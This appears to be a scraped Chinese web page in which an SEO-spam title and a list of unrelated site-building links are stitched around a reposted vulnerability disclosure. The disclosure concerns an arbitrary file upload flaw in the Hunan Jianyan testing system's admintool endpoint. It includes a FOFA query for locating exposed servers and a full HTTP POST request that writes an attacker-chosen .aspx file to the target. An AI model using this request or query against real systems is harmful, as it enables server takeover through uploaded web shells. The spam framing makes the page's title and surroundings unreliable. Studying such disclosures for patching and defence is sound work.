当前位置: 首页 > news >正文

张槎网站设计网站建设博采

张槎网站设计,网站建设博采,wordpress 4.2,建设银行假网站首页文章目录 前言声明一、漏洞详情二、影响版本三、漏洞复现四、修复建议 前言 湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。 声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者…

文章目录

  • 前言
  • 声明
  • 一、漏洞详情
  • 二、影响版本
  • 三、漏洞复现
  • 四、修复建议


前言

湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞详情

本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。

二、影响版本

湖南建研-检测系统 

在这里插入图片描述

三、漏洞复现

FOFA: body="/Content/Theme/Standard/webSite/login.css"

上传文件数据包

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, brfilePath=log.aspx&fileContent=abc

在这里插入图片描述
访问上传路径
在这里插入图片描述

四、修复建议

升级至最新版本

http://www.yayakq.cn/news/840887/

相关文章:

  • 太原网站建设网站网站宽度1200px
  • 番禺网站建设培训班wordpress 强制登录
  • 用微信怎么做商城网站吗企业资质查询
  • 以前做视频的网站吗成都的网站建设
  • 智信建设职业培训学校网站电商的网站
  • 建设网站证书查询网站建设推广工作描述
  • 网站建设技术难点php可以做视频网站
  • 济南网站建设找聚搜网络大连百姓网免费发布信息网站
  • 怎么样做淘宝优惠券网站秦皇岛抚宁区建设局网站
  • 北京地铁建设的网站韶关公司做网站
  • c 网站建设报告微信公众号运营策划书范文
  • 网站建设款属不属于无形资产wordpress文章导入在哪里
  • 做电子商务网站价格慢慢来建站公司
  • 免费个人网站空间申请北京建设网站的
  • 犀牛云做网站如何制作网站用什么软件好
  • 湖南省住房城乡建设网站凡科精选app
  • 手机网站建设必要性丰台网页设计公司
  • 最好科技广州网站建设天津市工程建设项目报建网站
  • 主流网站建设wordpress公司网站模版
  • 加快网站访问速度成都装修设计公司首选
  • 网站建设多少钱十年乐云seowordpress 修改权限
  • 做翻译赚钱的网站好电脑商城网站模板
  • 中核西北建设集团网站移动端前端开发需要学什么
  • 东莞一站式网站建设网站建设非功能需求
  • 南宁哪里有网站建设培训班wordpress 作品集
  • 南通工程建设信息网站网站项目验收确认书
  • 网站设计制作有哪些原因苏州海外建站公司
  • 做公司网站怎么做手机版临夏州住房和城乡建设厅网站
  • 泉州网站排名优化如何通过建设一个网站赚钱
  • 网站404是什么意思qq小程序官网